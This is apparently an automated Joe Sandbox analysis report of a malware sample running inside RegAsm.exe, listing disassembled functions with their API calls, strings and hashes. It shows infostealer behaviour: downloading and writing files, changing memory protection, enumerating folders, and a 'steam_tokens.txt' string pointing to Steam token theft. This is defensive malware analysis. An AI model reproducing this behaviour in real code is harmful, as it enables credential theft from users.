Instruction ID: 0e87048c4c810025046b2ff71762e49e4161a917b2b12ba1ada2c112072a28c4
Opcode Fuzzy Hash: 62a4c53fcb9bf593e476f24c714467af4436e90a2949d6c67d663f3053a85b1f
Instruction Fuzzy Hash: 5ED05BB1D0020256CF1077725D59A57229D9E11316740052FF840D7151F53DDCC4C27D

Uniqueness

Uniqueness Score: -1.00%

Function 00412A70 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 728COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,01572138,?,00428574,?,?,00000000,015721F8,00000000,?,015719D8,?,00428570), ref: 004131EA

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00405850: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004058B5

Part of subcall function 00405850: StrCmpCA.SHLWAPI(?,0156F910,?,?,?,?,?,?,0000000D), ref: 004058ED
Part of subcall function 00405850: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405912
Part of subcall function 00405850: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000D), ref: 00405935
Part of subcall function 00405850: InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 0040594E
Part of subcall function 00405850: WriteFile.KERNEL32(00000000,?,000000FF,004203D8,00000000,?,?,?,?,?,?,0000000D), ref: 0040596E
Part of subcall function 00405850: InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405998
Part of subcall function 00405850: CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000D), ref: 004059B4
Part of subcall function 00405850: InternetCloseHandle.WININET(00000000), ref: 004059BB
Part of subcall function 00405850: InternetCloseHandle.WININET(00000000), ref: 004059C2

Strings

F, xrefs: 00413482

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$File$CloseHandle$CreateOpenReadlstrcat$DirectoryWritelstrlen
String ID: F
API String ID: 3336520604-1304234792
Opcode ID: 64933d0dfc4c3c513359294a403d82db5c53117708ef4ed9c4664b0891a92b25
Instruction ID: c04eb2c2e67ebdd07284bf2178d9f41eb0a15058c49e10529a03e517fbc21d46
Opcode Fuzzy Hash: 64933d0dfc4c3c513359294a403d82db5c53117708ef4ed9c4664b0891a92b25
Instruction Fuzzy Hash: F6626D70805288EACB15E7E5C951BDDBBB85F19308F1480AEE54573282DF781B4CCBBA

Uniqueness

Uniqueness Score: -1.00%

Function 004069E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,6k@,?,?,?,?,00406B36), ref: 00406A55

Strings

6k@, xrefs: 00406A3F, 00406A42

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: 6k@
API String ID: 544645111-796046284
Opcode ID: 3cd70f51d592b6cc45cf5fa41d2a0a34811b31e58a1e5b5358e74f1d35610851
Instruction ID: 3aa464cb03e6a5daef80767049aabb5e2f81a0e8360af49d45380e9ae7790c68
Opcode Fuzzy Hash: 3cd70f51d592b6cc45cf5fa41d2a0a34811b31e58a1e5b5358e74f1d35610851
Instruction Fuzzy Hash: D211C6717141149FD724EF5CD8807A5F3D5FB0A300F51853AF94AE7280D639AC619B99

Uniqueness

Uniqueness Score: -1.00%

Function 004116F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

?{B, xrefs: 00411717, 00411725

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID: ?{B
API String ID: 1699248803-2221931326
Opcode ID: e79796351f89c84eeedae8a54d9f090e4875ca2003630773c6d08024e9c7cace
Instruction ID: a4db74e52ac5736c466cc754061609f1f71d2f4092c2171fd08521da563084ac
Opcode Fuzzy Hash: e79796351f89c84eeedae8a54d9f090e4875ca2003630773c6d08024e9c7cace
Instruction Fuzzy Hash: F7F08231A1015CABDB10DB58DC51B9EB7FDDB44715F1042A6B908A32C0D6706F0A8B94

Uniqueness

Uniqueness Score: -1.00%

Function 00411690 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Strings

J@, xrefs: 004116AB, 004116CB

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: J@
API String ID: 3188754299-3016281811
Opcode ID: d8f784d34889ff53bad89def2e75e44130d81317278a711d09a1317144491cd1
Instruction ID: cb1ed88cae5c2bc93b3530c0dbec5c822ac86073251ab52e185eaeaf3754e9f1
Opcode Fuzzy Hash: d8f784d34889ff53bad89def2e75e44130d81317278a711d09a1317144491cd1
Instruction Fuzzy Hash: 57F08271904658ABCB10DF58D901B99B768EB09B34F20476AFC35937D0C73D5A4086C4

Uniqueness

Uniqueness Score: -1.00%

Function 00410D30 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

Unknown, xrefs: 00410D64

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProfilelstrcpy
String ID: Unknown
API String ID: 2831436455-1654365787
Opcode ID: 19b3602f314757e0faabd27852db01908b64834fb2260b4e9b2713c893113fbd
Instruction ID: bd33c02f77d4a78c5fd75930b30a6426299f1aaef28d0e4199fa1c9ffb468557
Opcode Fuzzy Hash: 19b3602f314757e0faabd27852db01908b64834fb2260b4e9b2713c893113fbd
Instruction Fuzzy Hash: 95E09232B0112857CB20AA98EC017EEB3ADDB48615F40017EFD0CD3281DE64591987D9

Uniqueness

Uniqueness Score: -1.00%

Function 1C2804D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

failed to allocate %u bytes of memory, xrefs: 1C2804E7

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID:
String ID: failed to allocate %u bytes of memory
API String ID: 0-1168259600
Opcode ID: 836ffabc390fa88819987d7c0cf60d038b2cee3f144b55098393dfa5de3e88db
Instruction ID: 3c1e5a77f2030c1a4769737c88c7bf35526638bfce048356717f3d50566dfa67
Opcode Fuzzy Hash: 836ffabc390fa88819987d7c0cf60d038b2cee3f144b55098393dfa5de3e88db
Instruction Fuzzy Hash: 7FC02222ECC22223C20111D0AC01ECA79800B50590F014130FD4819220D255AC5443E2

Uniqueness

Uniqueness Score: -1.00%

Function 004157E0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

lstrlen.KERNEL32(00000000,00000000,?,00000000,0042839F,?,00000000,00422B08,000000FF,?,00418576,?), ref: 00415847

Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041585F

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 2356188485-3507145866
Opcode ID: 93ed9f98140693d4800eedd969e1417f7b0fe10de79906e738de47a47268dbad
Instruction ID: 057213227454b999660eab999351d39f71ae5e0843097ab142fe287d80eba7c3
Opcode Fuzzy Hash: 93ed9f98140693d4800eedd969e1417f7b0fe10de79906e738de47a47268dbad
Instruction Fuzzy Hash: 0B315E71800248EACB15EBA5C906BDDBBB8AB19308F50416EF905736C2DF7C1608CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 00411750 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

Strings

c?A, xrefs: 0041175E

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: c?A
API String ID: 3494564517-3973445457
Opcode ID: d4369522996f46429e2b8f99c10d083dc768b15d27a8655d7000d2a46742015a
Instruction ID: 2f6bf1855c54fdaf0a86b6469ee1b170798d26e677cda476d0f85d276026e230
Opcode Fuzzy Hash: d4369522996f46429e2b8f99c10d083dc768b15d27a8655d7000d2a46742015a
Instruction Fuzzy Hash: 6EF0EC363406151787120F5D98405A7F79EEFD5E50714426BEB68DB3A5D925DC4042E4

Uniqueness

Uniqueness Score: -1.00%

Function 00408080 Relevance: 2.8, APIs: 2, Instructions: 263stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

lstrlen.KERNEL32(00000000), ref: 004082EB
lstrlen.KERNEL32(00000000), ref: 004082FF

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 6e9e9eb8b5b35013eda92946bae44ba3db7cf4b02ddd6fc1e07a456bea934820
Instruction ID: bb0ed716b75b08caa87d0d0c4c5828f057020467c4c4a3a58b00df7d74f44575
Opcode Fuzzy Hash: 6e9e9eb8b5b35013eda92946bae44ba3db7cf4b02ddd6fc1e07a456bea934820
Instruction Fuzzy Hash: 61B18F71800248EACB04EBA5C955BEDBBB8AF19304F14416EF906B3282DF785B08C779

Uniqueness

Uniqueness Score: -1.00%

Function 00417AE0 Relevance: 2.6, APIs: 2, Instructions: 144stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(00000000,00000000), ref: 00417B37
lstrcat.KERNEL32(?,01571698), ref: 00417B56

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417838
Part of subcall function 00417800: FindFirstFileA.KERNEL32(?,?), ref: 0041784F

Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
Part of subcall function 00417800: wsprintfA.USER32 ref: 004178DB
Part of subcall function 00417800: StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
Part of subcall function 00417800: wsprintfA.USER32 ref: 00417907
Part of subcall function 00417800: PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
Part of subcall function 00417800: lstrcat.KERNEL32(?,0156F900), ref: 00417963
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428720), ref: 00417975
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 00417983
Part of subcall function 00417800: lstrcat.KERNEL32(?,00428724), ref: 00417995
Part of subcall function 00417800: lstrcat.KERNEL32(?,?), ref: 004179A9

Part of subcall function 00417800: wsprintfA.USER32 ref: 00417926
Part of subcall function 00417800: FindNextFileA.KERNEL32(000000FF,?), ref: 00417A7A
Part of subcall function 00417800: FindClose.KERNEL32(000000FF), ref: 00417A8C

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 153043497-0
Opcode ID: 2387276b7b8b7c9664f1e86e25683a9f53ba26dbb885212bccb56154d41d0255
Instruction ID: de26392101a7e2bfefa2a23e194a6feb2729e77266eca017e9eca27cf8ee7779
Opcode Fuzzy Hash: 2387276b7b8b7c9664f1e86e25683a9f53ba26dbb885212bccb56154d41d0255
Instruction Fuzzy Hash: CD51AEB1900204ABCB04EF64CC42EEE7779AB49B04F10475EFD4567292DB789B88CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00406630 Relevance: 2.6, APIs: 2, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406AEE), ref: 0040668F
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406AEE), ref: 004066C3

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8e52c199fb5f4c61d9d5a6f440312f4a164c62c567e16456f99efbfb905a6b89
Instruction ID: 9c2575cd9cc3d2590bf8831d886fe8abcf871dfdbc43e53dc684b4ea66081c40
Opcode Fuzzy Hash: 8e52c199fb5f4c61d9d5a6f440312f4a164c62c567e16456f99efbfb905a6b89
Instruction Fuzzy Hash: 9B21B4B13407005BC334CF79DC91FA7BBEAEB80714F144A2EEA5AD63D0D67AA850C658

Uniqueness

Uniqueness Score: -1.00%

Function 00406AA0 Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69b099d378ad8cdfd24c87f9314115fb2290ea22320d676167e748dd43bceb
Instruction ID: 8a5e77b9863af6b226ff7dc5fb5ac28a5c2fe39b41e9eed2e301d918e302b378
Opcode Fuzzy Hash: 0c69b099d378ad8cdfd24c87f9314115fb2290ea22320d676167e748dd43bceb
Instruction Fuzzy Hash: 034180B5E002159BCB14DF59D941AAFB7B8AF54314F11407BE80AE7391E738ED10CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00411D10 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(0041873A,0041873A), ref: 00411D49

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 336d4d8b2dba9eb5ac9ae929dca5d85499c3e2856889d74d340306a8913ab722
Instruction ID: ad82ca9af257c979786628663affac42eb56b3cf1ee156bcd106859eda3eeca6
Opcode Fuzzy Hash: 336d4d8b2dba9eb5ac9ae929dca5d85499c3e2856889d74d340306a8913ab722
Instruction Fuzzy Hash: 22E0A5B0E0421D9BCB40DFE4E40469EBBF4EF48304F40816AD408A6200EB7446458BE9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004173C0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 165stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004173EE
HeapAlloc.KERNEL32(00000000), ref: 004173F5
